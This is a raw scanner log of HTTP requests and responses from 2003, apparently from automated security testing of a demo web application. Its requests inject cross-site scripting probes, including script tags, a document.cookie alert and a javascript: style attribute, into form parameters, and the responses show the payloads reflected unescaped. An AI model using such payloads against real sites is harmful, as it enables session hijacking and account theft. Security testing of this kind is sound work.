colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=--><script>alert('XSS')</script>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:43 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /forgot2.asp?msg2=no&msg=test@<script>alert(document.cookie)</script>.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/forgot1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:57 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 1862 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Forgotten Password</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>F&nbsp;O&nbsp;R&nbsp;G&nbsp;O&nbsp;T&nbsp;T&nbsp;E&nbsp;N&nbsp;&nbsp;&nbsp;&nbsp;P&nbsp;A&nbsp;S&nbsp;S&nbsp;W&nbsp;O&nbsp;R&nbsp;D</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center">test@<script>alert(document.cookie)</script>.com</td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#c000ff><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> </form> </Table> </table> </body> </html>
GET /admin/help.cgi HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Connection: closed Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 17:02:31 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:46:59 GMT ETag: "a43861f7a9dc11:8f6" Content-Length: 46 <HTML></HTML>bleh exploit :0:0: [boot loader]
GET /login/login.asp?Action=Login&UserName=333%2D333%2D3333test@test999.com&Password=333%2D333%2D3333test@test999.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login/login.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:48 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 351 Content-Type: text/html Cache-control: private <HTML> <HEAD> <BODY> <h1>Invalid username: 333-333-3333test@test999.com</h1> <form action=login.asp method=get> Please login:<br> Username: <input type=text name=UserName><br> Password: <input type=password name=Password><br> <input type=submit value="Login"><br> <input type=hidden name=Action value="Login"><br> </form> </BODY></HTML>
GET /error.html HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:24:18 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT ETag: "45f49c1a8dc11:8f6" Content-Length: 125 <html> <body> Error Diagnostic Information<br><br> <A href="/default.asp">The welcome page</A><br> <br> </body> </html>
POST /testing/pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/testing/ Content-Length: 48 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect cboPage=</textarea><script>alert('XSS')</script>
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:56:38 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 194 Content-Type: text/html Cache-control: private <html> <body> A user should never see this text<br> this page is a redirect only page. The page that the user selected was </textarea><script>alert('XSS')</script> </body> </html>
POST /testing/pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/testing/ Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect cboPage=pc1
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:46 GMT X-Powered-By: ASP.NET Location: p1.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /join.asp?name=&email=&surname=</textarea><script>alert('XSS')</script>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:32 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4014 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=--><script>alert('XSS')</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:43 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=1"style="background:url(javascript:alert('XSS'))"%20"&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4025 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm HTTP/1.0 Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/index.htm Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:24:25 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:12 GMT ETag: "d0f2f5fea9dc11:8f6" Content-Length: 39 <A HREF="./link14/index.htm">Link14</A>
GET /join.asp?name=&email=&surname=&house=</textarea><script>alert('XSS')</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:35 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4014 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail 